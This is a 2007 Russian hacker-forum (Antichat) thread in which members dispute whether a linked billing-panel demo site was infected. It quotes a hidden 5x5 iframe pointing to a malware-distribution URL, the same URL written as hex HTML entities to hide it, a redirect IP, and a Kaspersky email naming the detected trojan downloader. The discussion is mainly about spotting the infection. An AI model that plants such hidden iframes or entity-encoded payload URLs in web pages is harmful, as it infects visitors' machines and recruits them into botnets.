Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   _Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец! (https://forum.antichat.xyz/showthread.php?t=32266)

[Y.P.C.]yla 29.01.2007 01:07

_Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!
 
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad:
*****(22:33:43 28/01/2007)
Тему удалили как я понял и я его не увидел.
И передай урсуле, что она возможно уже чей-то бот
Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил.
*****(22:34:17 28/01/2007)
Это гаврила написал

И обьясни от куда ты нарыл
_______________________________
****** (23:07:35 28/01/2007)
На самом деле в раскодированном виде выглядит это так

<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>

Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php
Ах да
Вот письмо от дяди Жени

Здравствуйте.
1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx)
2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы.

Благодарим за оказанную помощь.
---------
С уважением, Юрий Несмачный
Вирусный аналитик
ЗАО "Лаборатория Касперского"

_____________________
Вопрос: позволь узнать как ты раскодировал?

Petr 29.01.2007 01:14

Вот это и называеца параноя.

Undernative 29.01.2007 01:19

Мне отсюда инетересно чем он сделал декод....

[Y.P.C.]yla 29.01.2007 01:19

Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!

Petr 29.01.2007 01:31

Цитата:

Сообщение от [YPC]YL@
Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!

У меня такое было очень часто, но я обезаписл себя отовсех и отовсюду, и теперь я свободен от всех.
просто день идет, а я все жив.

Ksander 29.01.2007 01:34

а через пм или асю никак нельзя у него это узнать ? тему я удалю

Undernative 29.01.2007 01:38

Ксан.не трогай тему.Нужен глаС народа

[Y.P.C.]yla 29.01.2007 01:45

Итак обратившись в Лаб Касперского,вот что выдало:
Trojan-Downloader.JS.Agent.bx

Детектирование добавлено 11 дек 2006 01:09 MSK
Обновление выпущено 11 дек 2006 03:08 MSK
Поведение Trojan-Downloader, троянский загрузчик


У данной программы пока нет описания.

Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы.


Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку?

RemaerD
Спасибо...

Гаврила 29.01.2007 01:46

Цитата:

Сообщение от [YPC]YL@
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad:

Что именно тебя запарило???
И как попала моя переписка с Ремаёрдом тебе???
Скорее этот вопрос нужно задать Ремаёрду..
Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.
Цитата:

Сообщение от Ksander
а через пм или асю никак нельзя у него это узнать ? тему я удалю

Ну так я и общался с Ремаёрдом через пм.
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
Урсула сбавь обороты.
Подслушивать (подглядывать) чужие разговоры неприлично.
p.s.
Не надо писать мне в пм.
Я не даю уроков кодирования ссылок =)

Undernative 29.01.2007 01:55

ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...

УРС ЧмогЕ

[Y.P.C.]yla 29.01.2007 01:55

Цитата:

Сообщение от Гаврила
Что именно тебя запарило???
И как попала моя переписка с Ремаёрдом тебе???
Скорее этот вопрос нужно задать Ремаёрду..
Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.

Солнце,да не волнуйся ты так!
Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :(
Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил?

Цитата:

Сообщение от Гаврила
Ну так я и общался с Ремаёрдом через пм.
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
Урсула сбавь обороты.
Подслушивать (подглядывать) чужие разговоры неприлично.
p.s.
Не надо писать мне в пм.
Я не даю уроков кодирования ссылок =)

Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+))
А в пм я тебе написала...ну чтоб не заснул+)

[Y.P.C.]yla 29.01.2007 01:57

RemaerD чмоГ:-*

Гаврила 29.01.2007 02:09

Цитата:

Сообщение от [YPC]YL@
Солнце,да не волнуйся ты так!
Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :(
Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил?


Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+))
А в пм я тебе написала...ну чтоб не заснул+)

Ладно, так и быть, научу тебя =)
http://ha.ckers.org/xss.html
Отмотаешь страницу вниз, вставишь код в графу HTML (with semicolons):
Нажмёш кнопку Decode под этой строкой.
Вверху увидишь читаемый текст.
Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того.
PHP код:

&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x72;&#x61;&#x66;&#x66;&#x6C;&#x6F;&#x61;&#x64;&#x73;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x6F;&#x75;&#x74;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x73;&#x5F;&#x69;&#x64;&#x3D;&#x32; 

Как видишь, космического нет ничего =)
А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это.
Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё.
========
Ах, ну я понял, репы то у вас типа превед +10.
Тогда понятно =)

[Y.P.C.]yla 29.01.2007 02:25

Цитата:

Сообщение от Гаврила
Ладно, так и быть, научу тебя =)
Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того.

Спасибо большое!+)я не понимаю с чего ты решил что это вирус....... ну выдало ссылку.....но не вимжу я ничего подозрительного
Цитата:

Сообщение от Гаврила
Как видишь, космического нет ничего =)
А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это.
Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё.

Я ремаёрд-а такими вопросами не гружу,так как успеваю итак достать ими :D
========
Цитата:

Сообщение от Гаврила
Ах, ну я понял, репы то у вас типа превед +10.
Тогда понятно =)

нет....+20 :p

[Y.P.C.]yla 29.01.2007 03:03

Короче Гаврила...все эти кода и ссылки да ..замечательно...просто отлично!
Но все же вопрос остается....а фактов так и нет....хмм...каким же макаром ты определил и подумал что там вирус...которого нет?
бред какойто!вернее не вирус...а троян..

Дрэгги 29.01.2007 03:18

Мда...я читал но даже не понял о чем тут речь..жаль у меня не так много времени сидеть на ачате...может тогда бы и смог понять о чем речь в этой теме.

Дрэгги 29.01.2007 03:20

Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...

[Y.P.C.]yla 29.01.2007 03:25

Дрэгги
Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!Гаврила сказал мол там Трояны...и т.д и т.п.
Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..он утверждает,что там трояны....но их там нету....=\
я сама ниче не понимаю...из того,что он говорит!

censored! 29.01.2007 03:31

Цитата:

Там был обычный ифрейм с загрузчиком
Фига се. Обычный ифрейм с загрузчиком =))))

Звучит как - да подумаешь, тебе троян установился. Делов то! =))))
...
p.s. участникам темы читать что такое довнлоадер и нафига его вообще используют (для чего)

[Y.P.C.]yla 29.01.2007 03:32

Цитата:

Сообщение от Дрэгги
Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...

Да нет...
мой комп не превратился в бота!это ИМХо
и зловредной ссылки тоже не было!
пЫсЫ:я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю!
Гаврила как раз утверждает что что ботов эта херь собирала для доссов

censored! 29.01.2007 03:35

Цитата:

мой комп не превратился в бота!это ИМХо
Откуда такая уверенность?

Просто - собирала ботов. Возможно для доса, может еще для чего.

Цитата:

я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю
Скинь в ПМ.

Просто с Гаврилой я по ПМ много общался и всякую хреновину он гнать уж точно не будет.

[Y.P.C.]yla 29.01.2007 03:38

блин ну не прально выразилась значит.
там файл ....там есть ссылка на скачивание архива этой билинг панели(демо-версии)

[Y.P.C.]yla 29.01.2007 03:40

censored!
ок.щас в пм пришлю....а то чесно говоря я уже запуталась!=\

censored! 29.01.2007 03:40

Цитата:

блин ну не прально выразилась значит
Да по теме вообще не поймешь что за кипишь. =)

Закинь ссылку в ПМ - я завтра посмотрю чего там.

[Y.P.C.]yla 29.01.2007 03:56

censored!
Там такое пм-ище......токо не пугайся!Я там все выписала...чтоб было тебе понятнее!
И прочти все!!

Дрэгги 29.01.2007 04:18

Цитата:

Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..
А что это такое? Frame - это вроде как рамка на английском...а как ты вообще можешь по ссылке определить что она ведет на загрузку трояна?

Цитата:

Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!
А откуда это все у тебя? Тебе нужны программеры? :confused: :confused: :confused: :confused:

blaga 29.01.2007 04:24

ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.

[Y.P.C.]yla 29.01.2007 04:30

Цитата:

Сообщение от Дрэгги
А откуда это все у тебя? Тебе нужны программеры? :confused: :confused: :confused: :confused:

Нужен был програмер который бы создал билинг-панель для ZeosHost-а. Я дала пример этой панеле по ссылке ******. там на странице была демо версия админки и для пользователей,которую можно было собствено и глянуть!На сайте ****.pp в ифрейме висит загрузка.....там тот архив закодирован в зенде и работает только на одном хостинге.там есть ссылка на скачивание архива этой панели, (но на другом сервере её не установишь, так как файлы закодированы зендом.)
Гаврила говорил что не стоит заходить и т.д и т.п....

Но там ничего...никаких троянов....ботов...и прочего не было!!!
Я смотрела и код самой страницы и за ифрейм смотрела.все было нормал.

вот и архив этой панели, в нём есть файл типа header.inc.php, как я понимаю в нём прописывается сервер.
http://******xpanel.rar

Короче хелп ми.....крыша скоро окончательно уедет!!я разбиралась...и смотрела уже по 100 раз...ну не понимаю....ну нету там ниче :confused:

[Y.P.C.]yla 29.01.2007 04:32

Цитата:

Сообщение от blaga
ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.

:confused: :confused:
......все....крыша уехала и мозги тоже!!АААА!!!
щас от переизбытка инфы и замешательств взрыв будет!!!!

blaga 29.01.2007 04:34

Так, что конкретно не понятно? Так твоя крыша далеко не уедет....

[Y.P.C.]yla 29.01.2007 04:39

Цитата:

Сообщение от blaga
Так, что конкретно не понятно?

А конкретно мне не понятно....про трояна...боты про которые Гаврил говорил!
Лично для меня ничего не свидетельствует о том что _ссылка небезопасная_ "что она возможно уже чей-то бот =)
Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил."(с)Гаврила
:confused: :confused: :confused:

Дрэгги 29.01.2007 04:40

Цитата:

......все....крыша уехала и мозги тоже!!АААА!!!
щас от переизбытка инфы и замешательств взрыв будет!!!!
как раз в том что сказал blaga я все понял. Осел - это браузер IE.

А вот читая твой пост у меня реально крыша едет так как я в таких сложных вещах не разбираюсь..

Цитата:

создал билинг-панель для ZeosHost-а.
???


Цитата:

там тот архив закодирован в зенде и работает только на одном хостинге.там есть ссылка на скачивание архива этой панели, (но на другом сервере её не установишь, так как файлы закодированы зендом.)
????????????????

А тут у меня уже из глаз звездочки посыпались от обилия информации.

blaga 29.01.2007 04:42

Через эту ссылку грузят троянов. Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом. Например для ддоса. Еще раз через эту ссылку грузят троянов. Ясно? Как они это работает это уже другой вопрос.

blaga 29.01.2007 04:45

2Дрэгги, закодированы зендом - значит что скрипт не запустится абы где. Только на одном серваке. А ей нужно что бы он запускался везде. Для этого нужно зенд расшифровать. Чего вы все непонятливые такие.

Дрэгги 29.01.2007 04:45

а что значит файлы и архив закодированы зендом??? Да и слова Zeoshost и билинг-панель для меня мало что говорят...

Цитата:

Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом.
А антивирь типа нод32 от этого не помогает разве?

Дрэгги 29.01.2007 04:47

а все понял про зенд...а про зеосхост и билинг панель еще не дошло:)

[Y.P.C.]yla 29.01.2007 04:47

blaga
Через какую именно ссылку грузят трояна??

Ну не может этого быть!!!Ведь там ссылка была для загрузки демо-версии самой панели!!!А не трояна!
Или я туплю...или незнаю....=\

[Y.P.C.]yla 29.01.2007 04:49

Дрэгги
зеосхост - это __ http://zeoshost.ru/ =)))))

blaga 29.01.2007 04:49

Цитата:

<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>
вот через этот ифрейм и грузится троян. Твоя ссылка на скачку тут ни при чем.

[Y.P.C.]yla 29.01.2007 04:55

blaga
Ну так!!Не было ведь этой ссылки!!Этого ифрейма!! ___*разум начал прояснятся*___
Было вот:
<IFRAME src="&#x68;&#x74........и т.д и т.п(куча знаков)))" width=5 height=5 style="display:none"></IFRAME>


Время: 17:19